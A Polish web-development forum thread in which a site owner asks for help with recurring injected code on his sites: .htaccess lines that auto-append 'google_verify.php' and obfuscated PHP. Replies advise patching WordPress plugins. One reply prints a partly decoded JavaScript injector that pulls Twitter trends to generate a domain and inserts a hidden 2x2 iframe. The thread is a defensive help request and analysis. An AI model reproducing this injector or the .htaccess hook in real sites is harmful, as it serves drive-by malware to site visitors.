[php, bezpieczeństwo] Podejżane pliki na serwerze google_verify Opcje

[kamil881]

Witam,
Na wszystkich stronach na serwerze, dodały się dziwne fragmenty kodu - niektóre zaszyfrowane php w plikach, a niektóre wywołane przez .htacces:

Kod

<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>

<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>

Oto podejrzany kod: http://wklej.org/id/652715/, co po odkodowaniu daje http://wklej.org/id/652713/,

Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach...

Z góry dzięki za pomoc i wesołych świąt
Kamil

Ten post edytował kamil881 22.12.2011, 13:05:51

[zordon]

napisz do swojej firmy hostingowej, może to jakieś statystyki?

[kamil881]

Kontaktowałem się z nimi, statystyki hostingowe mam poza tym z Piwika.

[thek]

No to pozostaje jeszcze rozkodować te liczby i będziesz wiedział o co kaman Może skrypt się wbił i utworzył jakies konto administratorskie, dlatego Twoje zmiany na nic się zdają, bo koleś i tak ma dostęp.

[kamil881]

Gdybym wiedział jak się za nie zabrać... .

Dostałem logi od usługodawcy, a w nich dziwne próby połączenia z adresu 78.42.176.36... Niemieckie ip, więc na pewno nikt powołany - na razie adres zablokowany.

Ten post edytował kamil881 22.12.2011, 13:42:36

[erix]

Wyczyściłem wszystko, pozmieniałem hasła do ftp, baz etc. Starałem się również przeszukać pod tym kątem komputer, ale po kliku dniach wszystko się powtórzyło. Przejrzałem logi, ale nie ma nic podejrzanego w postach i getach...

No ok, ale co po tym, jak pozmieniasz loginy i hasła, jak nadal działają dziurawe skrypty?

Połataj aplikację, dopiero potem się zabieraj za to, co trzeba, bo będziesz w nieskończoność to kasował.

A blokowanie IP Ci nic nie da - to prawdopodobnie botnet, który skanuje Sieć w poszukiwaniu dziurawych aplikacji i dodaje w ten sposób kolejne węzły.

[kamil881]

Poza aktualnym wordpressem i zwykłymi statycznymi stronami, nie mam nic innego...

[erix]

A czy pluginy wszystkie masz w porządku?

nie mam nic innego...

Jesteś w stanie dać za to głowę? Ja bym sprawdził.

[kamil881]

Głowy w stanie dać nie jestem, cóż, będę jeszcze nad tym siedział.

[Dragas]

Tak z ciekawości zabawiłem się za wstępne rozszyfrowanie tego zakofowanego kodu.
Wygląda od mniejwięcej tak:

Kod

function anonymous() {
    (function () {Date.prototype.jsq = function () {var jsBP = this;return [jsBP.getUTCFullYear(), jsBP.getUTCMonth(), jsBP.getUTCDate(), jsBP.getUTCHours(), jsBP.getUTCMinutes(), jsBP.getUTCSeconds()];};Date.prototype.jsk = function () {var jsr, jsBp = this.jsq(), i = 0;jsBp[1] += 1;while (i++ < 7) {jsr = jsBp[i];if (jsr < jsM) {jsBp[i] = jsm("z") + jsr;}}return jsBp.splice(jsm("z"), 1 + jsm("T")).join(jsm("u")) + "T" + jsBp.join(jsm("U"));};jsBG = {h: "http://", s: "/", t: "tre", d: "dai", n: "nds", q: "?", c: "callback=", j: "js", a: "api", l: "ly", W: "twitter", o: "com", e: "1", k: "s", K: "body", x: "ajax", D: ".", L: "libs", J: "jquery", '6': "6.2", m: "min", f: "on", S: "cript", i: "if", M: "rame", Y: "head", w: "width:", p: "px;", H: "height:", T: "2", r: "rc", Q: "\"", y: "style=", b: "><", R: "></", I: "div", B: "<", A: ">", g: "google", E: "&date=", z: "0", u: "-", U: " ", ',': ":00", ';': 2345678901, '/': 48271, F: 198195254, G: 12, C: "="};
function jsm(jsBu) {jsT = [];for (jsBa = 0; jsBa < jsBu.length; jsBa++) {jsT.push(jsBG[jsBu.charAt(jsBa)]);}return jst(jsT);}

jsBi = document;jsu = window;jsu.jsy = "undefined";jsu.jsz = jsm("haDWDosestnsdlDjfqcq");jsH = typeof $ == jsu.jsy;if (jsH || !jsBc()) {if (!jsH) {try {jsBg = jQuery.noConflict(true);} catch (e) {}try {jsBg = $.noConflict(true);} catch (e) {}}jsBS = jsBi.getElementsByTagName(jsm("Y"))[0];jsE = jsBi.createElement(jsm("kS"));jsE.setAttribute(jsm("kr"), jsm("hxDgakDosxsLsJseD6sJDmDj"));jsBS.appendChild(jsE);}
function jsBR(jss, jsBF) {return Math.floor(jss / jsBF);}


function jsv(jsd) {var jsBf = jsBR(jsu.jsL, jsu.jsBx);var jsw = jsu.jsL % jsu.jsBx;var jsN = jsu.jsBp * jsw;var jsF = jsu.jsBm * jsBf;var jse = jsN - jsF;if (jse > 0) {jsL = jse;} else {jsL = jse + jsu.jsBA;}return jsL % jsd;}


function jsJ(jsn) {jsu.jsL = jsm(";") + jsn;jsu.jsBp = jsm("/");jsu.jsBA = jsm(";") - jsm("F");jsu.jsBx = jsBR(jsu.jsBA, jsu.jsBp);jsu.jsBm = jsu.jsBA % jsu.jsBp;}


function jst(jsB) {return jsB.length == 1 ? jsB[0] : jsB.join("");}


function jsR(jsB) {d = new Date;jsA = jsm("zee");d.setTime((jsB.as_of - jsm("G") * jsm("G") * jsm("G") * jsm("ezz")) * jsm("ezzz"));return d;}


function jso(jsBC) {var jsi, jsBh, jsG = jsBC.length;var jsx = [];while (--jsG) {jsBh = jsv(jsG);jsx.push(jsBh);jsi = jsBC[jsBh];jsBC[jsBh] = jsBC[jsG];jsBC[jsG] = jsi;}}


function jsBL($) {jsBE = $.map([81, 85, 74, 74, 92, 17, 82, 73, 80, 30, 82, 77, 25, 11, 10, 10, 61, 11, 56, 55, 11, 53, 6, 53, 7, 2, 1, 0, 48], function (x, i) {return String.fromCharCode(i + x + 24);});return jst(jsBE);}


function jsj(x) {return x.length;}


function jsBT($) {if (typeof $ != jsu.jsy) {$(function () {if (typeof $.jsBo != jsu.jsy) {return;}$.jsBo = 1;$.getJSON(jsz, function (jsBM) {jsD = jsR(jsBM);jsK = jsD.getUTCMonth() + + jsm("e");jsBN = jsD.getUTCDate();jsp = function (x, i) {return jsj(x + "") - 1 ? x : "0" + x;};jsBe = jsp(jsK, 4) + "-" + jsp(jsBN, 7);jsa = jsz + jsm("ETzeeu") + jsBe;jsBD = jsBy = jsBR(jsD.getUTCHours(), 6) * 6 + + jsm("e");jsBz = jsBD + 1;jsM = + jsm("ez");setTimeout(function () {$.getJSON(jsa, function (jsBM) {try {jsS = jsBM.trends;jsf = jsm("Tzeeu") + jsBe + " ";if (jsBD < jsM) {jsBD = jsm("z") + jsBD;}if (jsBz < jsM) {jsBz = jsm("z") + jsBz;}jsc = jsS[jsf + jsBD + jsm(",")];if (!jsc) {jsc = jsS[jsf + jsBz + jsm(",")];}jsc = (jsc[3].name.toLowerCase().replace(/[^a-z]/gi, "") + "microscope").split("");jsC = jsK * 71 + jsBy * 3 + jsBN * 37;jsJ(jsC);jsj = jsv(4) + jsM;jso(jsc);jsb = jsm("Ch") + jst(jsc).substring(0, jsj) + ".com/" + jsBL($);jsBG.Z = jsb;jsBr = jsm("BIyQHTpweeepQbiMUyQHTpweeepQUkrZRiMRIA");$(jsm("K")).append(jsBr);} catch (jsBq) {}});}, jsM * jsM * jsM);});});} else {setTimeout(function () {jsBT(jsu.jQuery);}, 1 + jsm("TTT"));}}

jsBT(jsu.jQuery);}());
}

Dodatkowo przechwyciłęm z czym się łączy:
http://ajax.googleapis.com/ajax/libs/jquer...2/jquery.min.js
http://api.twitter.com/1/trends/daily.json..._=1325094272460
http://api.twitter.com/1/trends/daily.json..._=1325094273908

To chyba wszystko co wyłapałem na chwile obecną.

Pozdrawiam Dragas